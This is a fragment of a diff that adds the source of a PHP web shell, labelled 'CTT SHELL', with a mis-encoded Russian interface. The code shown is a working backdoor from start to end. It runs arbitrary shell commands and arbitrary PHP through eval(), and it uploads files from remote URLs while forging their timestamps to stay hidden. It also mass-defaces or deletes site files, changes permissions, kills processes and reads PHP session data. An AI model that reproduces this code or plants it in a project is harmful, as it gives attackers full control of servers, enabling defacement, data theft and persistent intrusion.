+  $sum_owner = $owner[0] + $owner[1] + $owner[2];
+  $sum_group = $group[0] + $group[1] + $group[2];
+  $sum_world = $world[0] + $world[1] + $world[2];
+  $sum_chmod = "0".$sum_owner.$sum_group.$sum_world;
+  $ret = @chmod($d.$f, $sum_chmod);
+  if ($ret) {$act = "ls";}
+  else {echo "<b>Èçìåíåíèå Àòğèáóò Ôàéëà (".$d.$f.")</b>: Îøèáêà<br>";}
+ }
+ else
+ {
+  echo "<center><b>Èçìåíåíèå Àòğèáóò Ôàéëà</b><br>";
+  $perms = view_perms(fileperms($d.$f));
+  $length = strlen($perms);
+  $owner_r = $owner_w = $owner_x =
+  $group_r = $group_w = $group_x = 
+  $world_r = $world_w = $group_x = "";
+
+  if ($perms[1] == "r") {$owner_r = " checked";} if ($perms[2] == "w") {$owner_w = " checked";}
+  if ($perms[3] == "x") {$owner_x = " checked";} if ($perms[4] == "r") {$group_r = " checked";}
+  if ($perms[5] == "w") {$group_w = " checked";} if ($perms[6] == "x") {$group_x = " checked";}
+  if ($perms[7] == "r") {$world_r = " checked";} if ($perms[8] == "w") {$world_w = " checked";}
+ if ($perms[9] == "x") {$world_x = " checked";}
+  echo "<form method=\"POST\"><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value='".htmlspecialchars($f)."'>
+<input type=hidden name=act value=chmod><input type=hidden name=submit value=1><input type=hidden name='owner[3]' value=no_error>
+<input type=hidden name='group[3]' value=no_error><input type=hidden name='world[3]' value=no_error>
+<table class=table1><tr><td class=td2><table class=table1 align=center width=300 border=0 cellspacing=0 cellpadding=5><tr><td class=td2><b>Owner</b><br><br>
+<input type=checkbox NAME=owner[0] value=4".$owner_r.">Read<br><input type=checkbox NAME=owner[1] value=2".$owner_w.">Write<br>
+<input type=checkbox NAME=owner[2] value=1".$owner_x.">Execute</font></td><td class=td2><b>Group</b><br><br>
+<input type=checkbox NAME=group[0] value=4".$group_r.">Read<br>
+<input type=checkbox NAME=group[1] value=2".$group_w.">Write<br>
+<input type=checkbox NAME=group[2] value=1".$group_x.">Execute</font></td>
+<td class=td2><b>World</b><br><br><input type=checkbox NAME=world[0] value=4".$world_r.">Read<br>
+<input type=checkbox NAME=world[1] value=2".$world_w.">Write<br>
+<input type=checkbox NAME=world[2] value=1".$world_x.">Execute</font></td>
+</tr></table></td></tr><tr align=center><td><input type=submit name=chmod value=\"Ñîõğàíèòü\"></td></tr></table></FORM></center>";
+ }
+}
+if ($act == "upload")
+{
+ $uploadmess = "";
+ $uploadpath = str_replace("\\","/",$uploadpath);
+ if (empty($uploadpath)) {$uploadpath = $d;}
+ elseif (substr($uploadpath,strlen($uploadpath)-1,1) != "/") {$uploadpath .= "/";}
+ if (!empty($submit))
+ {
+  global $HTTP_POST_FILES;
+  $uploadfile = $HTTP_POST_FILES["uploadfile"];
+  if (!empty($uploadfile[tmp_name]))
+  {
+if (empty($uploadfilename)) {$destin = $uploadfile[name];}
+else {$destin = $userfilename;}
+if (!move_uploaded_file($uploadfile[tmp_name],$uploadpath.$destin)) {$uploadmess .= "Îøèáêà, çàãğóæàşùàÿ ôàéë ".$uploadfile[name]." (íå ìîæåò ñêîïèğîâàòü \"".$uploadfile[tmp_name]."\" íà \"".$uploadpath.$destin."\"!<br>";}
+  }
+  elseif (!empty($uploadurl))
+  {
+if (!empty($uploadfilename)) {$destin = $uploadfilename;}
+else
+{
+ $destin = explode("/",$destin);
+ $destin = $destin[count($destin)-1];
+ if (empty($destin))
+ {
+  $i = 0;
+  $b = "";
+  while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
+}
+if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
+else
+{
+ $st = getmicrotime();
+ $content = @file_get_contents($uploadurl);
+ $dt = round(getmicrotime()-$st,4);
+ if (!$content) {$uploadmess .=  "Íå ìîæåò çàãğóçèòü ôàéë!<br>";}
+ else
+ {
+  if ($filestealth) {$stat = stat($uploadpath.$destin);}
+  $fp = fopen($uploadpath.$destin,"w");
+  if (!$fp) {$uploadmess .= "Îøèáêà, ïèøóùàÿ ôàéëó ".htmlspecialchars($destin)."!<br>";}
+  else
+  {
+fwrite($fp,$content,strlen($content));
+fclose($fp);
+if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
+  }
+ }
+}
+  }
+ }
+ if ($miniform)
+ {
+  echo "<b>".$uploadmess."</b>";
+  $act = "ls";
+ }
+ else
+ {
+  echo "<b>Çàãğóçêà Ôàéëà:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$sul."act=upload&d=".urlencode($d)."\" method=\"POST\">
+Ëîêàëüíûé ôàéë: <br><input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;èëè<br>
+Çàãğóçèòü èç URL: <br><input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
+Ñîõğàíèòü ıòîò ôàéëü â ïàïêó: <br><input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
+Èìÿ Ôàéëà: <br><input name=uploadfilename size=25>
+<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;Êîíâåğòèğîâàòü èìÿ ôàéëà<br><br>
+<input type=\"submit\" name=\"submit\" value=\"Çàãğóçèòü\">
+</form>";
+ }
+}
+if ($act == "delete")
+{
+ $delerr = "";
+ foreach ($actbox as $v)
+ {
+  $result = false;
+  $result = fs_rmobj($v);
+  if (!$result) {$delerr .= "Íå ìîæåò óäàëèòü ".htmlspecialchars($v)."<br>";}
+  if (!empty($delerr)) {echo "<b>Óäàëåíèå ñ îøèáêàìè:</b><br>".$delerr;}
+ }
+ $act = "ls";
+}
+if ($act == "onedelete")
+{
+ $delerr = "";
+  $result = false;
+  $result = fs_rmobj($f);
+  if (!$result) {$delerr .= "Íå ìîæåò óäàëèòü ".htmlspecialchars($f)."<br>";}
+  if (!empty($delerr)) {echo "<b>Óäàëåíèå ñ îøèáêàìè:</b><br>".$delerr;}
+ $act = "ls";
+}
+if ($act == "onedeleted")
+{
+ $delerr = "";
+  $result = false;
+  $result = fs_rmobj($d+'/'+$f);
+  if (!$result) {$delerr .= "Íå ìîæåò óäàëèòü ".htmlspecialchars($f)."<br>";}
+  if (!empty($delerr)) {echo "<b>Óäàëåíèå ñ îøèáêàìè:</b><br>".$delerr;}
+ $act = "ls";
+}
+if ($act == "deface")
+{
+ $deferr = "";
+ foreach ($actbox as $v)
+ {
+  $data = $deface_html;
+  if (eregi("%%%filedata%%%",$data)) {$data = str_replace("%%%filedata%%%",file_get_contents($v),$data);}
+  $data = str_replace("%%%filename%%%",basename($v),$data);
+  $data = str_replace("%%%filepath%%%",$v,$data);
+  $fp = @fopen($v,"w");
+  fwrite($fp,$data);
+  fclose($fp);
+  if (!$result) {$deferr .= "Can't deface ".htmlspecialchars($v)."<br>";}
+  if (!empty($delerr)) {echo "<b>Defacing with errors:</b><br>".$deferr;}
+ }
+}
+if (!$usefsbuff)
+{
+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"USEFSBUFF\" as TRUE.</center>";}
+}
+else
+{
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); ct_sess_put($sess_data); $act = "ls";}
+ if ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); ct_sess_put($sess_data); $act = "ls";}
+ if ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} $ls_arr = array_merge($sess_data["copy"],$sess_data["cut"]); ct_sess_put($sess_data); $act = "ls";}
+ 
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); ct_sess_put($sess_data);}
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+$to = $d.basename($v);
+if (!fs_copy_obj($v,$d)) {$psterr .= "Íå ìîæåò ñêîïèğîâàòü ".$v." to ".$to."!<br>";}
+if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+$to = $d.basename($v);
+if (!fs_move_obj($v,$d)) {$psterr .= "Íå ìîæåò ïåğåìåñòèòüñÿ ".$v." to ".$to."!<br>";}
+unset($sess_data["cut"][$k]);
+  }
+  ct_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Ïğèêëåèâàíèå ñ îøèáêàìè:</b><br>".$psterr;}
+  $act = "ls";
+ }
+ elseif ($actarcbuff)
+ {
+  $arcerr = "";
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
+  else {$ext = ".tar.gz";}
+  
+  if ($ext == ".tar.gz")
+  {
+$cmdline = "tar cfzv";
+  }
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
+  foreach($objects as $v)
+  {
+$v = str_replace("\\","/",$v);
+if (is_dir($v))
+{
+ if (substr($v,strlen($v)-1,strlen($v)) != "/") {$v .= "/";}
+ $v .= "*";
+}
+$cmdline .= " ".$v;
+  }
+  $ret = `$cmdline`;
+  if (empty($ret)) {$arcerr .= "Íå ìîæåò íàçâàòü archivator!<br>";}
+  $ret = str_replace("\r\n","\n");
+  $ret = explode("\n",$ret);
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+if (in_array($v,$ret)) {fs_rmobj($v);}
+unset($sess_data["cut"][$k]);
+  }
+  ct_sess_put($sess_data);
+  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
+  $act = "ls";
+ }
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+$to = $d.basename($v);
+if (!fs_copy_obj($v,$d)) {$psterr .= "Íå ìîæåò ñêîïèğîâàòü ".$v." to ".$to."!<br>";}
+if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+$to = $d.basename($v);
+if (!fs_move_obj($v,$d)) {$psterr .= "Íå ìîæåò ïåğåìåñòèòüñÿ ".$v." to ".$to."!<br>";}
+unset($sess_data["cut"][$k]);
+  }
+  ct_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Ïğèêëåèâàíèå ñ îøèáêàìè:</b><br>".$psterr;}
+  $act = "ls";
+ }
+}
+if ($act == "ls")
+{
+ if (count($ls_arr) > 0) {$list = $ls_arr;}
+ else
+ {
+  $list = array();
+  if ($h = @opendir($d))
+  {
+while ($o = readdir($h)) {$list[] = $d.$o;}
+closedir($h);
+  }
+ }
+ if (count($list) == 0) {echo "<center><b>Íå ìîæåò îòêğûòü ñïğàâî÷íèê (".htmlspecialchars($d).")!</b></center>";}
+ else
+ {
+  $tab = array();
+  $amount = count($ld)+count($lf);
+  $vd = "f"; 
+  if ($vd == "f")
+  {
+$row = array();
+$row[] = "<b><center>Èìÿ</b>";
+$row[] = "<b><center>Ğàçìåğ</center></b>";
+$row[] = "<b><center>Èçìåíåí</center></b>";
+if (!$win)
+  {$row[] = "<b><center>Âëàäåëåö/Ãğóïïà</center></b>";}
+$row[] = "<b><center>Ïğàâà</center></b>";
+$row[] = "<b><center>Ôóíêöèè</center></b>";
+
+$k = $sort[0];
+if ((!is_numeric($k)) or ($k > count($row)-2)) {$k = 0;}
+if (empty($sort[1])) {$sort[1] = "d";}
+if ($sort[1] != "a")
+{
+ $y = "<a href=\"".$sul."act=".$dspact."&d=".urlencode($d)."&sort=".$k."a\"><img src=\"".$sul."act=img&img=sort_desc\" border=\"0\"></a></center>";
+}
+else
+{
+ $y = "<a href=\"".$sul."act=".$dspact."&d=".urlencode($d)."&sort=".$k."d\"><img src=\"".$sul."act=img&img=sort_asc\" border=\"0\"></a></center>";
+}
+
+$row[$k] .= $y;
+for($i=0;$i<count($row)-1;$i++)
+{
+ if ($i != $k) {$row[$i] = "<a href=\"".$sul."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$sort[1]."\">".$row[$i]."</a>";}
+}
+
+$tab = array();
+$tab[cols] = array($row);
+$tab[head] = array();
+$tab[dirs] = array();
+$tab[links] = array();
+$tab[files] = array();
+
+foreach ($list as $v)
+{
+ $o = basename($v);
+ $dir = dirname($v);
+  
+ if ($disp_fullpath) {$disppath = $v;}
+ else {$disppath = $o;}
+ $disppath = str2mini($disppath,60);
+  
+ if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
+ elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
+
+ $uo = urlencode($o);
+ $ud = urlencode($dir);
+ $uv = urlencode($v);
+
+ $row = array();
+
+if (is_dir($v))
+ {
+  if (is_link($v)) {$disppath .= " => ".readlink($v); $type = "LINK";}
+  else {$type = "DIR";}
+  $row[] =  "<a href=\"".$sul."act=ls&d=".$uv."&sort=".$sort."\"> <img src=\"".$sul."act=img&img=small_dir\" height=\"16\" width=\"16\" border=\"0\">&nbsp; ".$disppath."</a>";
+  $row[] = $type;
+ }
+ elseif(is_file($v))
+ {
+  $ext = explode(".",$o);
+  $c = count($ext)-1;
+  $ext = $ext[$c];
+  $ext = strtolower($ext);
+  $row[] =  "<a href=\"".$sul."act=f&f=".$uo."&d=".$ud."&\"><img src=\"".$sul."act=img&img=ext_".$ext."\" height=\"16\" width=\"16\" border=\"0\">&nbsp; ".$disppath."</a>";
+  $row[] = view_size(filesize($v));
+ }
+ $row[] = "<center>".date("d.m.Y H:i:s",filemtime($v))."</center>";
+  
+ if (!$win)
+ {
+  $ow = @posix_getpwuid(fileowner($v));
+  $gr = @posix_getgrgid(filegroup($v));
+  $row[] = "<center>".$ow["name"]."/".$gr["name"]."</center>";
+ }
+
+ if (is_writable($v)) {$row[] = "<a href=\"".$sul."act=chmod&f=".$uo."&d=".$ud."\">".view_perms(fileperms($v))."</a>";}
+ else {$row[] = "<a href=\"".$sul."act=chmod&f=".$uo."&d=".$ud."\"><font color=\"red\">".view_perms(fileperms($v))."</font></a>";}
+
+ if (is_dir($v)) {$row[] = "&nbsp;<input type=\"checkbox\" name=\"actbox[]\" value=\"".htmlspecialchars($v)."\">&nbsp;<a href=\"".$sul."act=onedeleted&f=".$uo."&d=".$ud."\"><img src=\"".$sul."act=img&img=odel\" title=\"Delete\" height=\"16\" width=\"19\" border=\"0\"></a>";}
+ else {$row[] = "&nbsp;<input type=\"checkbox\" name=\"actbox[]\" value=\"".htmlspecialchars($v)."\">&nbsp;<a href=\"".$sul."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$sul."act=img&img=change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$sul."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$sul."act=img&img=download\" title=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$sul."act=onedelete&f=".$uo."&d=".$ud."\"><img src=\"".$sul."act=img&img=odel\" title=\"Delete\" height=\"16\" width=\"19\" border=\"0\"></a>";}
+
+ if (($o == ".") or ($o == "..")) {$tab[head][] = $row;}
+ elseif (is_link($v)) {$tab[links][] = $row;}
+ elseif (is_dir($v)) {$tab[dirs][] = $row;}
+ elseif (is_file($v)) {$tab[files][] = $row;}
+}
+  }
+  $v = $sort[0];
+  function tabsort($a, $b)
+  {
+global $v;
+return strnatcasecmp(strip_tags($a[$v]), strip_tags($b[$v]));
+  }
+  usort($tab[dirs], "tabsort");
+  usort($tab[files], "tabsort");
+  if ($sort[1] == "a")
+  {
+$tab[dirs] = array_reverse($tab[dirs]);
+$tab[files] = array_reverse($tab[files]);
+  }
+  $table = array_merge($tab[cols],$tab[head],$tab[dirs],$tab[links],$tab[files]);
+  echo "<TABLE class=table1  cellSpacing=0 cellPadding=0 width=100% border=0>
+<form method=\"POST\">";
+$smsn=0;
+  foreach($table as $row)
+  {
+$smsn++;
+ if ($smsn!=2 && $smsn!=3) { 
+echo "<tr>\r\n";
+foreach($row as $v) {echo "<td class=tds1 bgcolor=#242424>".$v."</td>\r\n";}
+echo "</tr>\r\n";
+}
+
+  }
+  echo "</table><TABLE height=1% class=table2 cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#333333 border=0>
+<tr class=tr2>
+<td width=8% height=1%><font size=2 color=#000000>
+Ïàïêè: ".(count($tab[dirs])+count($tab[links]))."</font></td>
+<td width=8% height=1%><font size=2 color=#000000> Ôàéëû: ".count($tab[files])."</font></td><td height=1% vAlign=top align=right>";
+if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
+  {
+echo "<input type=\"submit\" name=\"actarcbuff\" value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"actpastebuff\" value=\"Âñòàâèòü\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"actemptybuff\" value=\"Ïóñòîé áóôåğ\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+  }
+  echo "<select name=\"act\"><option value=\"".$act."\">Ñ îòîáğàííûì:</option>";
+  echo "<option value=\"delete\"".gchds($dspact,"delete"," selected").">Óäàëèòü</option>";
+  if ($usefsbuff)
+  {
+echo "<option value=\"cut\"".gchds($dspact,"cut"," selected").">Âûğàçàòü</option>";
+echo "<option value=\"copy\"".gchds($dspact,"copy"," selected").">Êîïèğîâàòü</option>";
+echo "<option value=\"unselect\"".gchds($dspact,"unselect"," selected").">Íåâûáğàòü</option>";
+  }
+  if ($dspact == "massdeface") {echo "<option value=\"deface\"".gchds($dspact,"deface"," selected").">Íåâûáğàòü</option>";}
+  echo "</select>&nbsp;<input type=\"submit\" value=\"Ïîäòâåğäèòü\">";
+  echo "</form>";
+
+echo "</td></tr></table>";
+echo "</td></tr></table><br><center><font size=2 color=#aaaaaa>[<a href=http://ctt.void.ru>CTT</a>] SHELL ver ".$shver."</font></center>";
+ }
+
+}
+if ($act == "cmd")
+{
+ if (!empty($submit))
+ {
+  echo "<b>Ğåçóëüòàò âûïîëíåíèÿ ıòà êîìàíäà</b>:<br>";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+ob_clean();
+myshellexec($cmd);
+$ret = ob_get_contents();
+$ret = convert_cyr_string($ret,"d","w");
+ob_clean();
+echo $tmp;
+if ($cmd_txt)
+{
+ $rows = count(explode("
+",$ret))+1;
+ if ($rows < 10) {$rows = 10;}
+ echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+}
+else {echo $ret;}
+  }
+  else
+  {
+if ($cmd_txt)
+{
+ echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+ myshellexec($cmd);
+ echo "</textarea>";
+}
+else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "<b>Êîìàíäà âûïîëíåíèÿ:</b>";  if (empty($cmd_txt)) {$cmd_txt = true;}}
+ echo "<form action=\"".$sul."act=cmd\" method=\"POST\"><textarea name=\"cmd\" cols=\"122\" rows=\"10\">".htmlspecialchars($cmd)."</textarea><input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><br><br><input type=\"submit\" name=\"submit\" value=\"Âûïîëíèòü\"><input type=\"hidden\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "ps_aux")
+{
+ echo "<b>Ïğîöåññû:</b><br>";
+ if ($win) {
+echo "<pre>";
+system('tasklist');
+echo "</pre>";
+}
+ else
+ {
+  if ($pid)
+  {
+if (!$sig) {$sig = 9;}
+echo "Sending signal ".$sig." to #".$pid."... ";
+$ret = posix_kill($pid,$sig);
+if ($ret) {echo "ok. he is dead, amen.";}
+else {echo "ERROR. Can't send signal ".htmlspecialchars($sig).", to process #".htmlspecialchars($pid).".";}
+  }
+  $ret = `ps -aux`;
+  if (!$ret) {echo "Can't execute \"ps -aux\"!";}
+  else
+  {
+$ret = htmlspecialchars($ret);
+$ret = str_replace(""," ",$ret);
+while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+$prcs = explode("\n",$ret);
+$head = explode(" ",$prcs[0]);
+$head[] = "ACTION";
+unset($prcs[0]);
+echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+echo "<tr border=\"1\">";
+foreach ($head as $v) {echo "<td><b>&nbsp;&nbsp;&nbsp;".$v."</b>&nbsp;&nbsp;&nbsp;</td>";}
+echo "</tr>";
+foreach ($prcs as $line)
+{
+ if (!empty($line))
+ {
+  echo "<tr>";
+  $line = explode(" ",$line);
+  $line[10] = join(" ",array_slice($line,10,count($line)));
+  $line = array_slice($line,0,11);
+  $line[] = "<a href=\"".$sul."act=ps_aux&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+  foreach ($line as $v) {echo "<td>&nbsp;&nbsp;&nbsp;".$v."&nbsp;&nbsp;&nbsp;</td>";}
+  echo "</tr>";
+ }
+}
+echo "</table>";
+  }
+ }
+}
+if ($act == "eval")
+{
+ if (!empty($eval))
+ {
+  echo "<b>Ğåçóëüòàò âûïîëíåíèÿ ıòîò PHP-êîä</b>:<br>";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+ob_clean();
+eval($eval);
+$ret = ob_get_contents();
+$ret = convert_cyr_string($ret,"d","w");
+ob_clean();
+echo $tmp;
+if ($eval_txt)
+{
+ $rows = count(explode("
+",$ret))+1;
+ if ($rows < 10) {$rows = 10;}
+ echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+}
+else {echo $ret;}
+  }
+  else
+  {
+if ($eval_txt)
+{
+ echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+ eval($eval);
+ echo "</textarea>";
+}
+else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "<b>PHP-êîä âûïîëíåíèÿ</b>"; if (empty($eval_txt)) {$eval_txt = true;}}
+ echo "<form method=\"POST\"><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=\"hidden\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "><input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><br><br><input type=\"submit\" value=\"Âûïîëíèòü\"></form>";
+}
+if ($act == "f")
+{
+ $r = @file_get_contents($d.$f);
+ if (!is_readable($d.$f) and $ft != "edit")
+ {
+  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
+  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$sul."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
+ }
+ else
+ {
+  $ext = explode(".",$f);
+  $c = count($ext)-1;
+  $ext = $ext[$c];
+  $ext = strtolower($ext);
+  $rft = "";
+  foreach($ftypes as $k=>$v)
+  {
+if (in_array($ext,$v)) {$rft = $k; break;}
+  }
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+  if (empty($ft)) {$ft = $rft;}
+
+  echo "<b>Ğàññìîòğåíèå ôàéëà:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$sul."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+  if (is_writable($d.$f)) {echo "<font color=\"green\">Ïîëíûé äîñòóï ÷òåíèÿ/çàïèñè (".view_perms(fileperms($d.$f)).")</font>";}
+  else {echo "<font color=\"red\">Read-Only (".view_perms(fileperms($d.$f)).")</font>";}
+ 
+  echo "<hr size=\"1\" noshade>";
+  if ($ft == "info")
+  {
+echo "<b>Information:</b>";
+echo "<table class=tab border=0 cellspacing=1 cellpadding=2>";
+echo "<tr class=tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr>";
+echo "<tr class=tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
+if (!$win)
+{
+ echo "<tr class=tr><td><b>Owner/Group</b></td><td> ";
+ $tmp=posix_getpwuid(fileowner($d.$f));
+ if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." ";
+ else echo $tmp['name']." ";
+ $tmp=posix_getgrgid(filegroup($d.$f));
+ if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f);
+ else echo $tmp['name'];
+}
+echo "<tr class=tr><td><b>Perms</b></td><td>";
+
+if (is_writable($d.$f))
+{
+ echo "<font color=\"green\">".view_perms(fileperms($d.$f))."</font>";
+}
+else
+{
+ echo "<font>".view_perms(fileperms($d.$f))."</font>";
+}
+
+echo "</td></tr>";
+echo "<tr class=tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr>";
+echo "<tr class=tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr>";
+echo "<tr class=tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr>";
+echo "</table><br>";
+
+
+$fi = fopen($d.$f,"rb");
+if ($fi)
+{
+ if ($fullhexdump)
+ {
+  echo "<b>FULL HEXDUMP</b>";
+  $str=fread($fi,filesize($d.$f));
+ }
+ else
+ {
+  echo "<b>HEXDUMP PREVIEW</b>";
+  $str=fread($fi,$hexdump_lines*$hexdump_rows);
+ }
+ $n=0;
+ $a0="00000000<br>";
+ $a1="";
+ $a2="";
+ for ($i=0; $i<strlen($str); $i++)
+ {
+  $a1.=sprintf("%02X",ord($str[$i])).' ';
+  switch (ord($str[$i]))
+  {
+case 0:  $a2.="<font class=s2>0</font>"; break;
+case 32: 
+case 10:
+case 13: $a2.="&nbsp;"; break;
+default:  $a2.=htmlspecialchars($str[$i]);
+  }
+  $n++;
+  if ($n == $hexdump_rows)
+  {
+$n = 0;
+if ($i+1<strlen($str)) {$a0.=sprintf("%08X",$i+1)."<br>";}
+$a1.="<br>";
+$a2.="<br>";
+  }
+ }
+ echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4 ".
+"class=sy><tr><td bgcolor=#666666> $a0</td><td bgcolor=000000>".
+"$a1</td><td bgcolor=000000>$a2</td></tr></table><br>";
+}
+$encoded = "";
+if ($base64 == 1)
+{
+ echo "<b>Base64 Encode</b><br>";
+ $encoded = base64_encode($r);
+}
+elseif($base64 == 2)
+{
+ echo "<b>Base64 Encode + Chunk</b><br>";
+ $encoded = chunk_split(base64_encode($r));
+}
+elseif($base64 == 3)
+{
+ echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
+ $encoded = base64_encode($r);
+ $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
+}
+elseif($base64 == 4)
+{
+}
+if (!empty($encoded))
+{
+ echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
+}
+echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
+<nobr>[<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
+<P>";
+  }
+  elseif ($ft == "html")
+  {
+if ($white) {@ob_clean();}
+echo $r;
+if ($white) {exit;}
+  }
+  elseif ($ft == "txt")
+  {
+echo "<pre>".htmlspecialchars($r)."</pre>";
+  }
+  elseif ($ft == "ini")
+  {
+echo "<pre>";
+var_dump(parse_ini_file($d.$f,true));
+echo "</pre>";
+  }
+  elseif ($ft == "phpsess")
+  {
+echo "<pre>";
+$v = explode("|",$r);
+echo $v[0]."<br>";
+var_dump(unserialize($v[1]));
+echo "</pre>";
+  }
+  elseif ($ft == "exe")
+  {
+echo "<form action=\"".$sul."act=cmd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"".htmlspecialchars($r)."\"><input type=\"submit\" name=\"submit\" value=\"Execute\">&nbsp;<input type=\"submit\" value=\"View&Edit command\"></form>";
+  }
